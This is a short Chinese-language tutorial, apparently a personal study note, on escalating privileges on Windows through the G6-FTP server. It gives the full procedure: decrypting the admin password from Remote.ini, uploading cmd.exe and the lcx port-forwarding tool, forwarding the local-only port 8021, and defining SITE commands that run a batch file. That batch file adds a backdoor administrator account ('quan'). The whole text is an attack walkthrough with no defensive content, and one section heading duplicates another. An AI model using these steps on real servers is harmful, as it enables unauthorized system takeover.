Day8——提权学习之第三方软件G6-FTP提权

0x00 G6-FTP简介

• G6 FTP Server 新一代的 FTP 服务器端软件，支持 RFC-959 标准并增强其中的某些功能，上传和下载都可以续传，实时查看运行状态，占用带宽，还有很多功能。

• G6-FTP的默认端口为8021，只侦听在127.0.0.1的8021端口上，所以无法从外部直接访问，需要进行端口转发（使用lcx 工具（lcx 具有三个功能：监听、转发、端口转向））。

0x01 提取方法

1、通过执行bat文件提权
2、通过映射bat文件提权

0x02 通过执行bat文件提权

步骤如下

1、下载配置文件Remote.ini，将administrator管理密码解密
用cmd5 破解

2、查找该网站的可读可写目录，然后上传cmd.exe和lcx.exe到该目录下

3、利用lcx端口转发 默认只允许本机连接

lcx.exe -tran 8027 127.0.0.1 8021

4、以管理员用户登录服务端
转发成功后，通过G6-FTP软件进行连接，以管理员用户登入

5、创建FTP用户并进行权限设置

6、上传批处理文件
adduser.bat中的文件内容为：即新建一个用户名为quan的用户，并且加入到管理员组中。

net user quan quan123 /add
net localgroup administrators quan /add

7、在G6-FTP软件中加入批处理命令
site commands-> +
Command:ADDUSER
Excute:

8、普通用户登录ftp

9、执行所加入的批处理命令
执行命令quote site adduser.bat

0x03 通过执行bat文件提权

可用性较差
步骤如下
1、以非特权用户登录
2、通过添加FTP用户账户hhh
3、对FTP服务器添加新的site命令
4、新建a.bat文件

net user quan quan123 /add
net localgroup administrators quan /add

5、将a.bat文件映射到新建的site命令

6、获取system权限
以test用户登录ftp服务器，执行以下命令
ftp>quote site a

0x04 参考文章

https://www.cnblogs.com/feizianquan/p/10892115.html
《网络攻防实战研究——漏洞利用与提权》